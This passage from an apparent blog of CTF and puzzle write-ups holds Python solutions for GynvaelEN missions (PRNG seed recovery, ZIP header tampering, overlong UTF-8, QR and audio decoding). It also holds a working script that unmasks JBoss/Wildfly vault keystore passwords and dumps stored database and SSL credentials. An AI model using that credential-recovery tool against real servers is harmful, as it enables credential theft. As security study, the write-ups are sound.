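    """Straight transcription of the bytecode: s must have the same length as
    good, and for every pair ((ord(cs) - 89) & 255) ^ 115 ^ 50 == ord(cg).
    s is bytes, so iterating yields the ord() values directly."""
    good = bytes.fromhex(GOOD_HEX)
    if len(s) != len(good):
        return False
    return all((((cs - 89) & 255) ^ 115) ^ 50 == cg for cs, cg in zip(s, good))


def recover_password():
    """Invert the per-byte transform: XOR is its own inverse, so undo the two
    XORs first, then add the 89 back and truncate to a byte (the & 255)."""
    good = bytes.fromhex(GOOD_HEX)
    return bytes(((cg ^ 50 ^ 115) + 89) & 255 for cg in good)


if __name__ == '__main__':
    pw = recover_password()
    print(pw.decode('ascii'), check_password(pw))
```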
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=s5gOW-N9AAo (1:46:20)<br />
<br />
# GynvaelEN mission 010 (2017-07-27)<br />
<pre># <code>cat mission_10.py</code>
<output>from pwn import *
host = '31.133.0.131' #'127.0.0.1'
port = 9393
def get_mask_len():
    i = 64
    while True:
        j = i * 8
        r = remote(host, port)
        r.sendlineafter('\n', 'A' * j)
        re = r.recvuntil('\n')
        r.close()
        if 'Meh' in re:
            break
        i += 1
    return j
def get_secret2():
    b1 = '00000001'
    mask = b1 * (ml / 8)
    r = remote(host, port)
    r.sendlineafter('\n', mask)
    re = r.recvuntil('\n')
    b0 = '0'
    bits = b0 * (ml / 8)
    r.sendline(bits)
    re = r.recvuntil('\n')
    if 'Access Granted' in re:
        for _ in range(4):
            print r.recvuntil('\n')
    r.close()
def get_bits():
    # Bits of secret1 selected by the positions where mask is '1'
    b = ''
    for i in range(len(mask)):
        if mask[i] == '1':
            b += secret1[i]
    return b
def check_result(m, b):
    r = remote(host, port)
    r.sendlineafter('\n', m)
    re = r.recvuntil('\n')
    r.sendline(b)
    re = r.recvuntil('\n')
    r.close()
    return re
def binary_to_str(binary):
    # Each group of 8 bits is stored least significant bit first
    s = ''
    for i in range(0, len(binary), 8):
        b = ''
        for j in range(8):
            b = binary[i + j] + b
        s += chr(int(b, 2))
    return s
def get_secret1():
    # Add one mask bit at a time and keep whichever value the service accepts
    for i in range(len(mask)):
        if mask[i] == '0':
            mask[i] = '1'
            tmask = ''.join(mask)
            for j in '01':
                secret1[i] = j
                bits = get_bits()
                if 'Access Granted' in check_result(tmask, bits):
                    break
ml = get_mask_len()
get_secret2()
secret1 = ['0'] * ml
mask = [i for i in '00000001'] * (ml / 8)
get_secret1()
print binary_to_str(get_bits())</output>
# <code>python mission_10.py</code>
<output>You have received one secret message:
---
Just Another Secret Message
---
This Crypto Is Absolutely Secure And There Will Be No Problem With It.</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=Vs8PLpHCoNY (1:45:30)<br />
<br />
# GynvaelEN mission 009 (2017-07-22)<br />
<pre># <code>cat mission_09.py</code>
<output>import datetime
# Microsoft rand
def rand():
    global seed
    seed = (seed * 214013 + 2531011) % 2147483648
    return seed / 65536
key = [0] * 31
secret = [0] * 31
xor = [0x9a, 0x60, 0x76, 0x14, 0x8b, 0x36, 0x5a, 0x10, 0x2b, 0x91, 0xc4, 0x6c, 0xab, 0x27, 0x92, 0x99, 0xf8, 0x6a, 0xec, 0x5d, 0x32, 0x20, 0x3d, 0x61, 0x8f, 0xc7, 0xfb, 0xdd, 0x02, 0x72, 0xbf]
for s in range(1500336000, 1500508800):
    seed = s
    for i in range(31):
        # Transcribed from the disassembly: magic-number division by 257
        eax = rand()
        rdx = (2139127681 * eax) >> 39
        ecx = eax >> 31
        edx = (rdx & 0xffffffff) - ecx
        ecx = edx << 8
        edx += ecx
        eax -= edx
        key[i] = eax & 0xff
    for i in range(31):
        secret[i] = (xor[i] ^ key[i]) & 0xff
    if all(c < 128 for c in secret):
        print 'seed =', s
        print 'time = ', datetime.datetime.fromtimestamp(s)
        print ''.join([chr(c) for c in secret])
        break</output>
# <code>python mission_09.py</code>
<output>seed = 1500483661
time = 2017-07-19 18:01:01
Who needs to store keys anyway.</output></pre><br />
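Added example (Python 3, my own code rather than the post's script): the multiply-and-shift sequence in the loop above is the compiler's way of computing rand() % 257, and this checks that identity over every value rand() can produce before running the same seed search with an early exit per candidate. It assumes only the constants already in mission_09.py.

```python
import datetime

# Constructed from the post above: the 31 ciphertext bytes from mission_09.py.
XOR = [0x9a, 0x60, 0x76, 0x14, 0x8b, 0x36, 0x5a, 0x10, 0x2b, 0x91, 0xc4, 0x6c,
       0xab, 0x27, 0x92, 0x99, 0xf8, 0x6a, 0xec, 0x5d, 0x32, 0x20, 0x3d, 0x61,
       0x8f, 0xc7, 0xfb, 0xdd, 0x02, 0x72, 0xbf]


class MsRand(object):
    """Microsoft CRT rand(): seed = seed * 214013 + 2531011 (mod 2^31),
    output = seed >> 16, so every output is below 2^15."""

    def __init__(self, seed):
        self.seed = seed

    def rand(self):
        self.seed = (self.seed * 214013 + 2531011) & 0x7fffffff
        return self.seed >> 16


def magic_mod257(eax):
    """The compiler's strength-reduced division transcribed from the loop in
    mission_09.py: q = (eax * 2139127681) >> 39, result = eax - q * 257.
    Only exercised on the non-negative rand() range here."""
    rdx = (2139127681 * eax) >> 39
    ecx = eax >> 31
    edx = (rdx & 0xffffffff) - ecx
    edx += edx << 8
    return (eax - edx) & 0xff


def key_byte(r):
    """What the magic sequence computes: r mod 257, truncated to a byte."""
    return (r % 257) & 0xff


def magic_matches_mod257():
    """Check the identity over every value rand() can return."""
    return all(magic_mod257(v) == key_byte(v) for v in range(1 << 15))


def recover(xor, start, end):
    """Try every timestamp seed in [start, end); accept the first one whose
    keystream turns every byte into 7-bit ASCII.  A candidate is dropped at
    its first non-ASCII byte instead of computing all 31 bytes first."""
    for s in range(start, end):
        rng = MsRand(s)
        plain = bytearray()
        for c in xor:
            b = c ^ key_byte(rng.rand())
            if b >= 128:
                break
            plain.append(b)
        else:
            return s, bytes(plain)
    return None


if __name__ == '__main__':
    assert magic_matches_mod257()
    seed, plain = recover(XOR, 1500336000, 1500508800)
    print('seed =', seed)
    print('time =', datetime.datetime.fromtimestamp(seed))
    print(plain.decode('ascii'))
```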
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=7RotbY17tKk (1:47:55)<br />
<br />
<u>Reference</u><br />
<br />
https://en.wikipedia.org/wiki/COFF<br />
<br />
# Decrypt Wildfly/Jboss vault passwords (2017-07-19)<br />
<pre># <code>cat standalone.xml</code>
<output>...
<vault>
<vault-option name="<highlight>KEYSTORE_URL</highlight>" value="${user.home}/<highlight>vault.store</highlight>"/>
<vault-option name="<highlight>KEYSTORE_PASSWORD</highlight>" value="<highlight>MASK-3y28rCZlcKR</highlight>"/>
<vault-option name="<highlight>KEYSTORE_ALIAS</highlight>" value="<highlight>vault</highlight>"/>
<vault-option name="<highlight>SALT</highlight>" value="<highlight>12438567</highlight>"/>
<vault-option name="<highlight>ITERATION_COUNT</highlight>" value="<highlight>50</highlight>"/>
<vault-option name="<highlight>ENC_FILE_DIR</highlight>" value="${user.home}/<highlight>vault.dat</highlight>"/>
</vault>
...</output>
# <code>cat vaultbreaker.py</code>
<output>import hashlib
import javaobj # pip install javaobj-py3
import jks # pip install pyjks
import string
import sys
from Crypto.Cipher import AES, DES
def clean(s):
    return filter(lambda x: x in string.printable, s).strip()
def get_derived_key(password, salt, count):
    # PBEWithMD5AndDES: iterate MD5 over password + salt; first 8 bytes are the key, next 8 the IV
    key = password + salt
    for i in range(count):
        m = hashlib.md5(key)
        key = m.digest()
    return (key[:8], key[8:])
def customb64decode(msg):
    # PicketBox's own base64 alphabet; '_' (index 64) is the padding character
    alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./_'
    result = ''
    for i in range(0, len(msg), 4):
        p0 = alphabet.index(msg[i])
        p1 = alphabet.index(msg[i + 1])
        p2 = alphabet.index(msg[i + 2])
        p3 = alphabet.index(msg[i + 3])
        if p0 != 64:
            result += chr(((p1 & 0x30) >> 4) | (p0 << 2))
        if p1 != 64:
            result += chr(((p2 & 0x3c) >> 2) | ((p1 & 0xf) << 4))
        result += chr(((p2 & 3) << 6) | p3)
    return result
def decrypt_keystore_password(enc_keystore_password, password, salt, iteration_count):
    # Padding goes in front of the masked value, not at the end
    num = 4 - (len(enc_keystore_password) % 4)
    if num != 4:
        enc_keystore_password = ('_' * num) + enc_keystore_password
    enc_text = customb64decode(enc_keystore_password)
    (dk, iv) = get_derived_key(password, salt, iteration_count)
    crypter = DES.new(dk, DES.MODE_CBC, iv)
    text = crypter.decrypt(enc_text)
    return clean(text)
def get_secret_key(keystore_filename, alias, keystore_password):
    ks = jks.KeyStore.load(keystore_filename, keystore_password)
    for a, sk in ks.secret_keys.items():
        if a == alias:
            return sk.key
    return None
def decrypt_vault_passwords(vault_filename, secret_key):
    decryption_suite = AES.new(secret_key, AES.MODE_ECB)
    print '[+] Vault passwords ='
    jobj = open(vault_filename, 'rb').read()
    pobj = javaobj.loads(jobj)
    for i in range(0, len(pobj.annotations[1].annotations), 2):
        key = pobj.annotations[1].annotations[i]
        value = pobj.annotations[1].annotations[i + 1]
        if key:
            plain_text = decryption_suite.decrypt(str(value))
            print '\t -', key, '=', clean(plain_text)
# Fixed string used by PicketBox to derive the masking key
passwd = "somearbitrarycrazystringthatdoesnotmatter"
KEYSTORE_PASSWORD = sys.argv[1]
KEYSTORE_ALIAS = sys.argv[2]
SALT = sys.argv[3]
ITERATION_COUNT = int(sys.argv[4])
keystore_filename = sys.argv[5]
vault_filename = sys.argv[6]
keystore_password = decrypt_keystore_password(KEYSTORE_PASSWORD, passwd, SALT, ITERATION_COUNT)
print '[+] Keystore password = ' + keystore_password
secret_key = get_secret_key(keystore_filename, KEYSTORE_ALIAS, keystore_password)
print '[+] Secretkey password = ' + secret_key.encode('hex')
decrypt_vault_passwords(vault_filename, secret_key)</output>
# <code>python vaultbreaker.py 3y28rCZlcKR vault 12438567 50 vault.store vault.dat</code>
<output>[+] Keystore password = vault22
[+] Secretkey password = 0e8f11aae5222d8280533a93bfaff4c3
[+] Vault passwords =
- ssl::SSLUSER = ssl_user
- datasource::HOST = 192.1.2.3
- ssl::SSLPASS = ssl_pass
- ssl::SSLALIAS = test
- datasource::PORT = 1521
- datasource::PASS = db_pass
- datasource::SERVICENAME = db
- datasource::USER = db_user</output></pre><br />
<u>Reference</u><br />
<br />
https://developer.jboss.org/wiki/JBossAS7SecuringPasswords<br />
<br />
<u>Done in collaboration</u><br />
<br />
https://atorralba.github.io/<br />
<br />
# GynvaelEN mission 008 (2017-07-15)<br />
<pre># <code>cat mission_08.py</code>
<output>number = 1087943696176439095600323762148055792209594928798662843208446383247024
i = 1
while True:
    h = hex(number / i)[2:-1]
    if len(h) % 2 == 0:
        s = h.decode('hex')
        if all(ord(c) < 128 for c in s):
            print s, i
            break
    i += 1</output>
# <code>python mission_08.py</code>
<output>Text is just a long number. 31336</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=OAk23u9b-88 (1:50:10)<br />
<br />
# GynvaelEN mission 007 (2017-07-02)<br />
<pre># <code>cat parser.py</code>
<output># 00000000 50 4b 03 04 14 00 00 00 00 00 fc 96 dc 4a 73 03 |PK...........Js.|
# 00000010 1a 7b 5e 00 00 00 7a 00 <highlight>00</highlight> 00 0a 00 00 00 72 65 |.{^...z.......re|
# 00000020 70 6f 72 74 2e 74 78 74 f8 07 54 16 3b 8b 63 cc |port.txt..T.;.c.|
# 00000030 78 b7 03 42 4c 35 b8 0f 72 43 87 8f ab a8 55 3b |x..BL5..rC....U;|
# 00000040 7f ee 9b 48 88 1a 2b cb f3 52 73 bf 6f e2 11 37 |...H..+..Rs.o..7|
# 00000050 f2 06 a9 d3 53 12 2b d1 fe ff 47 34 58 be be 03 |....S.+...G4X...|
# 00000060 7f cb 15 08 b2 5a 58 2e 3a 51 61 1c b2 db 63 b6 |.....ZX.:Qa...c.|
# 00000070 5e 3a 76 98 0b 9a 32 12 88 cb b2 8c d3 d6 d4 fa |^:v...2.........|
# 00000080 b7 37 b5 27 00 00 50 4b 01 02 14 00 14 00 00 00 |.7.'..PK........|
# 00000090 <highlight>00</highlight> 00 fc 96 dc 4a 73 03 1a 7b 5e 00 00 00 7a 00 |.....Js..{^...z.|
# 000000a0 00 00 0a 00 24 00 00 00 00 00 01 00 20 00 00 00 |....$....... ...|
# 000000b0 00 00 00 00 72 65 70 6f 72 74 2e 74 78 74 0a 00 |....report.txt..|
# 000000c0 20 00 00 00 00 00 01 00 18 00 00 6e 5c 69 2f f0 | ..........n\i/.|
# 000000d0 d2 01 00 6e 5c 69 2f f0 d2 01 80 d0 e0 52 2f f0 |...n\i/......R/.|
# 000000e0 d2 01 50 4b 05 06 00 00 00 00 01 00 01 00 5c 00 |..PK..........\.|
# 000000f0 00 00 86 00 00 00 00 00 |........|
# 000000f8
import struct
import sys
def extract_bytes(offset, num, ctype = None):
    # Raw bytes at [offset, offset + num), unpacked with ctype when one is given
    j = offset
    k = j + num
    if ctype:
        return struct.unpack(ctype, data[j:k])[0]
    else:
        return repr(data[j:k])
with open(sys.argv[1], 'rb') as f:
    data = f.read()
ep = 0
print 'Local file header signature', extract_bytes(ep + 0, 4)
print 'Version needed to extract', extract_bytes(ep + 4, 2)
print 'General purpose bit flag', extract_bytes(ep + 6, 2)
print 'Compression method', extract_bytes(ep + 8, 2)
print 'File last modification time', extract_bytes(ep + 10, 2)
print 'File last modification date', extract_bytes(ep + 12, 2)
print 'CRC-32', extract_bytes(ep + 14, 4)
cs = extract_bytes(ep + 18, 4, '<I')
print 'Compressed size', cs
print 'Uncompressed size', extract_bytes(ep + 22, 4)
n = extract_bytes(ep + 26, 2, '<H')
print 'File name length (n)', n
m = extract_bytes(ep + 28, 2, '<H')
print 'Extra field length (m)', m
print 'File name', extract_bytes(ep + 30, n)
print 'Extra field', extract_bytes(ep + 30 + n, m)
print '--------'
epcdfhs = data.index('PK\x01\x02')
i = ep + 30 + n
j = epcdfhs - cs - i
print 'Extra field', extract_bytes(i, j)
print 'Compressed data', extract_bytes(i + j, cs)
print '--------'
ep = epcdfhs
print 'Central directory file header signature', extract_bytes(ep + 0, 4)
print 'Version made by', extract_bytes(ep + 4, 2)
print 'Version needed to extract', extract_bytes(ep + 6, 2)
print 'General purpose bit flag', extract_bytes(ep + 8, 2)
print 'Compression method', extract_bytes(ep + 10, 2)
print 'File last modification time', extract_bytes(ep + 12, 2)
print 'File last modification date', extract_bytes(ep + 14, 2)
print 'CRC-32', extract_bytes(ep + 16, 4)
print 'Compressed size', extract_bytes(ep + 20, 4)
print 'Uncompressed size', extract_bytes(ep + 24, 4)
n = extract_bytes(ep + 28, 2, '<H')
print 'File name length (n)', n
m = extract_bytes(ep + 30, 2, '<H')
print 'Extra field length (m)', m
k = extract_bytes(ep + 32, 2, '<H')
print 'File comment length (k)', k
print 'Disk number where file starts', extract_bytes(ep + 34, 2)
print 'Internal file attributes', extract_bytes(ep + 36, 2)
print 'External file attributes', extract_bytes(ep + 38, 4)
print 'Relative offset of local file header', extract_bytes(ep + 42, 4)
print 'File name', extract_bytes(ep + 46, n)
print 'Extra field', extract_bytes(ep + 46 + n, m)
print 'File comment', extract_bytes(ep + 46 + n + m, k)</output>
# <code>python parser.py report.zip</code>
<output>Local file header signature 'PK\x03\x04'
Version needed to extract '\x14\x00'
General purpose bit flag '\x00\x00'
Compression method '<highlight>\x00</highlight>\x00'
File last modification time '\xfc\x96'
File last modification date '\xdcJ'
CRC-32 's\x03\x1a{'
Compressed size 94
Uncompressed size 'z\x00\x00\x00'
File name length (n) 10
Extra field length (m) 0
File name 'report.txt'
Extra field ''
--------
Extra field ''
Compressed data "\xf8\x07T\x16;\x8bc\xccx\xb7\x03BL5\xb8\x0frC\x87\x8f\xab\xa8U;\x7f\xee\x9bH\x88\x1a+\xcb\xf3Rs\xbfo\xe2\x117\xf2\x06\xa9\xd3S\x12+\xd1\xfe\xffG4X\xbe\xbe\x03\x7f\xcb\x15\x08\xb2ZX.:Qa\x1c\xb2\xdbc\xb6^:v\x98\x0b\x9a2\x12\x88\xcb\xb2\x8c\xd3\xd6\xd4\xfa\xb77\xb5'\x00\x00"
--------
Central directory file header signature 'PK\x01\x02'
Version made by '\x14\x00'
Version needed to extract '\x14\x00'
General purpose bit flag '\x00\x00'
Compression method '<highlight>\x00</highlight>\x00'
File last modification time '\xfc\x96'
File last modification date '\xdcJ'
CRC-32 's\x03\x1a{'
Compressed size '^\x00\x00\x00'
Uncompressed size 'z\x00\x00\x00'
File name length (n) 10
Extra field length (m) 36
File comment length (k) 0
Disk number where file starts '\x00\x00'
Internal file attributes '\x01\x00'
External file attributes ' \x00\x00\x00'
Relative offset of local file header '\x00\x00\x00\x00'
File name 'report.txt'
Extra field '\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00n\\i/\xf0\xd2\x01\x00n\\i/\xf0\xd2\x01\x80\xd0\xe0R/\xf0\xd2\x01'
File comment ''</output>
# <code>cat generate_zipfiles.py</code>
<output>from subprocess import Popen, PIPE
from sys import argv
cm = { 0: 'The file is stored (no compression)',
1: 'The file is Shrunk',
2: 'The file is Reduced with compression factor 1',
3: 'The file is Reduced with compression factor 2',
4: 'The file is Reduced with compression factor 3',
5: 'The file is Reduced with compression factor 4',
6: 'The file is Imploded',
7: 'Reserved for Tokenizing compression algorithm',
8: 'The file is Deflated',
9: 'Enhanced Deflating using Deflate64(tm)',
10: 'PKWARE Data Compression Library Imploding (old IBM TERSE)',
11: 'Reserved by PKWARE',
12: 'File is compressed using BZIP2 algorithm',
13: 'Reserved by PKWARE',
14: 'LZMA (EFS)',
15: 'Reserved by PKWARE',
16: 'Reserved by PKWARE',
17: 'Reserved by PKWARE',
18: 'File is compressed using IBM TERSE (new)',
19: 'IBM LZ77 z Architecture (PFS)',
97: 'WavPack compressed data',
98: 'PPMd version I, Rev 1'
}
ofn = argv[1]
nfn = 'new'
rfn = 'report.txt'
with open(ofn, 'rb') as f:
    data = f.read()
for i in range(256):
    # Patch the compression method byte in the local header (offset 8) and in the central directory entry (offset 144)
    data = data[:8] + chr(i) + data[9:144] + chr(i) + data[145:]
    with open(nfn, 'wb') as f:
        f.write(data)
    command = '7z x ' + nfn
    p = Popen(command.split(), stdout = PIPE, stderr = PIPE)
    o, e = p.communicate()
    if 'Everything is Ok' in o:
        print i, cm[i]
        command = 'cat ' + rfn
        p = Popen(command.split(), stdout = PIPE, stderr = PIPE)
        o, e = p.communicate()
        print o
    command = 'rm ' + nfn + ' ' + rfn
    p = Popen(command.split(), stdout = PIPE, stderr = PIPE)
    p.communicate()</output>
# <code>python generate_zipfiles.py report.zip</code>
<output>98 PPMd version I, Rev 1
The secret password is:
My name is Bond, James Bond.
Seriously, you could have guessed this based on the mission ID.</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=z9hfkajoAvc (1:25:15)<br />
<br />
<u>References</u><br />
<br />
https://en.wikipedia.org/wiki/Zip_(file_format)<br />
https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT (4.4.5)<br />
https://github.com/corkami/pics/blob/master/binary/zip101/zip101.pdf<br />
<br />
# An XOR alternative (2017-06-24)<br />
<pre># <code>cat xor_alternative.py</code>
<output>import sys
# data contains hex chars (a-f + 0-9) and random chars
# Chars are not repeated: the original string had 'U' twice, which breaks the
# index() lookup on the way back, so the second 'U' is replaced with 'V' here
data = '2ubfLkR0vsJ#)=SQtXNcO6AYPT1U+ja7W*h9I-y4GeHzn5&BK;_@$V3dm8^%'
def obfuscate(s, step):
    # Each byte becomes two hex digits; each digit is shifted 'step' positions along data
    out = ''
    ldata = len(data)
    for i in s:
        h = hex(ord(i))[2:]
        for j in h:
            p = data.index(j)
            p2 = (p + step) % ldata
            out += data[p2]
    return out
def deobfuscate(s, step):
    out = ''
    ldata = len(data)
    ls = len(s)
    for i in range(0, ls, 2):
        h = ''
        for j in range(2):
            p = data.index(s[i + j])
            p2 = (p - step) % ldata
            h += data[p2]
        out += chr(int(h, 16))
    return out
action = sys.argv[1]
s = sys.argv[2]
step = int(sys.argv[3])
print 'String =', s
print 'Step =', step
if action == 'o':
    print 'Action = Obfuscate'
    print 'Result =', obfuscate(s, step)
elif action == 'd':
    print 'Action = Deobfuscate'
    print 'Result =', deobfuscate(s, step)</output>
# <code>python xor_alternative.py o SECRET 1234</code>
<output>String = SECRET
Step = 1234
Action = Obfuscate
Result = c+=c=+ch=cc=</output>
# <code>python xor_alternative.py d c+=c=+ch=cc= 1234</code>
<output>String = c+=c=+ch=cc=
Step = 1234
Action = Deobfuscate
Result = SECRET</output></pre><br />
<u>Reference</u><br />
<br />
https://isc.sans.edu/forums/diary/Obfuscating+without+XOR/22544/<br />
<br />
# GynvaelEN mission 006 (2017-06-22)<br />
<pre># <code>cat mission_06.py</code>
<output>from PIL import Image
import qrtools
n = 25
m = 3
fn = 'mission_06.png'
matrix = [255 for i in range(n * n)]
with open('mission_06.data') as f:
    data = f.read().splitlines()
for line in data:
    # Each line is a "(i, j)" pair of a black module
    line = line[1:-1].split(', ')
    i = int(line[0])
    j = int(line[1])
    matrix[(i*n) + j] = 0
image = Image.new('L', (n, n))
image.putdata(matrix)
image.save(fn)
img = Image.open(fn)
img = img.rotate(-90)
img = img.resize((n * m, n * m), Image.ANTIALIAS)
img.save(fn)
qr = qrtools.QR(filename = fn)
if qr.decode():
    print qr.data</output>
# <code>python mission_06.py</code>
<output>Mirrored QR? Seriously?!</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=KvyBn4Btv8E (1:32:02)<br />
<br />
# GynvaelEN mission 005 (2017-06-01)<br />
<pre># <code>curl -v http://gynvael.vexillium.org/ext/thepicture/picture.image</code>
<output>Content-Encoding: <highlight>rle</highlight>
Content-Type: image/raw; <highlight>w=640,h=212,bpp=8</highlight></output>
# <code>cat mission_05.py</code>
<output>from struct import unpack
from PIL import Image
with open('picture.image', 'rb') as f:
    cdata = f.read()
ddata = []
# RLE pairs of (run length, value); the value is inverted and scaled to 8-bit grey
for i in range(0, len(cdata), 2):
    v = unpack('B', cdata[i + 1])[0] ^ 1
    for _ in range(unpack('B', cdata[i])[0]):
        ddata.append(v * 255)
image = Image.new('L', (640, 212))
image.putdata(ddata)
image.save('output.png')</output>
# <code>python mission_05.py</code></pre><br />
<br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=W7s5CWaw6I4 (1:20:57)<br />
<br />
<u>Reference</u><br />
<br />
https://en.wikipedia.org/wiki/Run-length_encoding<br />
<br />
# Confidence CTF 2k17: Starbyte - misc - 200 pts (2017-05-28)<br />
<pre># <code>cat starbyte.py</code>
<output>from PIL import Image, ImageDraw
import scipy.io.wavfile
import sys
import wave
inputfile = sys.argv[1]
wave_read_object = wave.open(inputfile, 'rb')
print 'Number of audio channels = ', wave_read_object.getnchannels()
print 'Sample width = ', wave_read_object.getsampwidth(), '(bytes)'
print 'Sampling frequency = ', wave_read_object.getframerate(), '(Hz)'
frames = wave_read_object.getnframes()
print 'Number of audio frames = ', frames
wave_read_object.close()
rate, data = scipy.io.wavfile.read(inputfile)
last_frame = -1
c = ''
r = ''
i = 0
for frame in data:
    # Two amplitude levels carry the bits; a level change starts a new bit
    if frame > 90:
        if last_frame != 1:
            c += '1'
            i += 1
        last_frame = 1
    elif frame > 23:
        if last_frame != 0:
            c += '0'
            i += 1
        last_frame = 0
    else:
        last_frame = -1
    if i == 10:
        nc = ''
        for j in c:
            nc = j + nc
        r += chr(int(nc, 2))
        c = ''
        i = 0
r = r.split('\n')
image = Image.new('RGB', (1000, 1000), 'black')
draw = ImageDraw.Draw(image)
for line in r:
    line = line.split()
    if 'LINE' in line:
        x1, y1, x2, y2 = map(int, line[1:])
        draw.line([(x1, y1), (x2, y2)], 'green')
    #elif 'REKT' in line:
    #    x1, y1, x2, y2 = map(int, line[1:])
    #    draw.rectangle([(x1, y1), (x2, y2)], None, 'green')
    elif 'CRCL' in line:
        x1, y1, rad = map(int, line[1:])
        draw.arc([(x1 - rad, y1 - rad), (x1 + rad, y1 + rad)], 0, 360, 'green')
image.save('image.png')</output>
# <code>python starbyte.py starbyte.wav</code>
<output>Number of audio channels = 1
Sample width = 1 (bytes)
Sampling frequency = 44100 (Hz)
Number of audio frames = 3885808</output>
# <code>eog image.png</code></pre><br />
<br />
# GynvaelEN mission 004 (2017-05-27)<br />
<pre># <code>cat mission_04.py</code>
<output>def hex2bin(h):
    binary = ''
    for i in range(0, len(h), 2):
        byte = h[i:i + 2]
        binary += format(int(byte, 16), '08b')
    return binary
def decode(u):
    # Keep only the payload bits of each sequence, however many bytes were spent on it
    lu = len(u)
    if lu == 2:
        return u.decode('hex')
    elif lu == 4:
        binary = hex2bin(u)
        r = binary[3:8] + binary[10:]
        return chr(int(r, 2))
    elif lu == 6:
        binary = hex2bin(u)
        r = binary[4:8] + binary[10:16] + binary[18:]
        return chr(int(r, 2))
    elif lu == 8:
        binary = hex2bin(u)
        r = binary[5:8] + binary[10:16] + binary[18:24] + binary[26:]
        return chr(int(r, 2))
message = 'E0818F766572C1ACE081AFE081AEC1A7E080A0E08195C194E081862DE080B8E080A0F08081B7C1A17320C1B3F08081B563C1A820E081A1F08080A0E081A6F08081B5F08081AE20E081A6E081A5F08081A1C1B475E081B2E081A5F08080AE'
result = ''
i = 0
while i < len(message):
    # Sequence length from the lead byte prefix: 0xxxxxxx, 110xxxxx, 1110xxxx, 11110xxx
    byte = int(message[i:i+2], 16)
    binary = format(byte, '08b')
    if binary[0] == '0':
        j = 2
    elif binary[0:3] == '110':
        j = 4
    elif binary[0:4] == '1110':
        j = 6
    elif binary[0:5] == '11110':
        j = 8
    u = message[i:i + j]
    i += j
    result += decode(u)
print result</output>
# <code>python mission_04.py</code>
<output>Overlong UTF-8 was such a fun feature.</output></pre><br />
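Added example (Python 3, my own code and not the post's script) for the defensive side of this mission: a lenient decoder like the one above turns the overlong sequences into plain ASCII, a strict decoder rejects them, and the validator reports each overlong sequence, which is the check an input filter needs before it compares bytes against a deny-list. It assumes nothing beyond the standard library and the message quoted above.

```python
# Added example (Python 3); not from the original post.  MESSAGE_HEX is the
# mission message quoted above; the functions are my own.
MESSAGE_HEX = ('E0818F766572C1ACE081AFE081AEC1A7E080A0E08195C194E081862DE080B8'
               'E080A0F08081B7C1A17320C1B3F08081B563C1A820E081A1F08080A0E081A6'
               'F08081B5F08081AE20E081A6E081A5F08081A1C1B475E081B2E081A5F08080AE')

# Smallest code point each sequence length is allowed to carry (RFC 3629).
MIN_CP = {1: 0x0, 2: 0x80, 3: 0x800, 4: 0x10000}


def seq_length(lead):
    """Sequence length from the lead byte prefix: 0xxxxxxx, 110xxxxx,
    1110xxxx, 11110xxx.  Deliberately lenient: 0xC0/0xC1 leads are allowed."""
    if lead < 0x80:
        return 1
    if 0xC0 <= lead < 0xE0:
        return 2
    if 0xE0 <= lead < 0xF0:
        return 3
    if 0xF0 <= lead < 0xF8:
        return 4
    raise ValueError('invalid lead byte 0x%02x' % lead)


def payload_bits(data, i, n):
    """Concatenate the payload bits of the n-byte sequence at offset i,
    ignoring how many bytes were spent on it (what mission_04.py does)."""
    if n == 1:
        return data[i]
    cp = data[i] & (0x7F >> n)          # 0x1F, 0x0F or 0x07 for n = 2, 3, 4
    for b in data[i + 1:i + n]:
        if b & 0xC0 != 0x80:
            raise ValueError('bad continuation byte 0x%02x' % b)
        cp = (cp << 6) | (b & 0x3F)
    return cp


def lenient_decode(data):
    """Overlong-tolerant decode: every sequence maps to its payload code point."""
    out, i = [], 0
    while i < len(data):
        n = seq_length(data[i])
        out.append(chr(payload_bits(data, i, n)))
        i += n
    return ''.join(out)


def overlong_sequences(data):
    """Report (offset, length, code_point) for every sequence that spends more
    bytes than its code point needs.  A filter that matches raw bytes against
    a deny-list misses exactly these, so they have to be rejected up front."""
    hits, i = [], 0
    while i < len(data):
        n = seq_length(data[i])
        cp = payload_bits(data, i, n)
        if cp < MIN_CP[n]:
            hits.append((i, n, cp))
        i += n
    return hits


def strict_decode_ok(data):
    """Python's own decoder enforces shortest form: overlong input raises."""
    try:
        data.decode('utf-8')
        return True
    except UnicodeDecodeError:
        return False


if __name__ == '__main__':
    msg = bytes.fromhex(MESSAGE_HEX)
    print('lenient :', lenient_decode(msg))
    print('strict  :', 'accepted' if strict_decode_ok(msg) else 'rejected')
    for off, n, cp in overlong_sequences(msg):
        print('overlong %d-byte form of U+%04X at offset %d' % (n, cp, off))
```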
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=iwRSFlZoSCM (1:26:42)<br />
<br />
<u>Reference</u><br />
<br />
https://es.wikipedia.org/wiki/UTF-8#Codificaci.C3.B3n_de_los_caracteres<br />
<br />
# GynvaelEN mission 003 (2017-05-14)<br />
<pre># <code>cat mission_03.py</code>
<output>import itertools
def base4to10(num):
    result = 0
    ln = len(num) - 1
    for i in num:
        result += int(i) * (4 ** ln)
        ln -= 1
    return result
def ascii_string(s):
    for i in s:
        if ord(i) < 32 or ord(i) > 126:
            return False
    return True
with open('huffman.code') as f:
    bd = f.read()[:-1]
values = ['0', '1', '00', '01', '10', '11', '000', '001', '010', '011', '100', '101', '110', '111']
# Try every assignment of four codes to the four base-4 digits
for i in itertools.permutations(values, 4):
    tree = {
        i[0]: '0',
        i[1]: '1',
        i[2]: '2',
        i[3]: '3',
    }
    code = ''
    result = ''
    for d in bd:
        code += d
        if code in tree:
            result += tree[code]
            code = ''
    try:
        decv = base4to10(result)
        hexv = hex(decv)[2:].replace('L', '')
        ascv = hexv.decode('hex')
        if ascii_string(ascv) and len(ascv) > 4:
            print 'tree =', tree
            print 'result =', result
            print 'dec =', decv
            print 'bytes =', hexv
            print 'ascii =', ascv[::-1]
            print
    except:
        pass
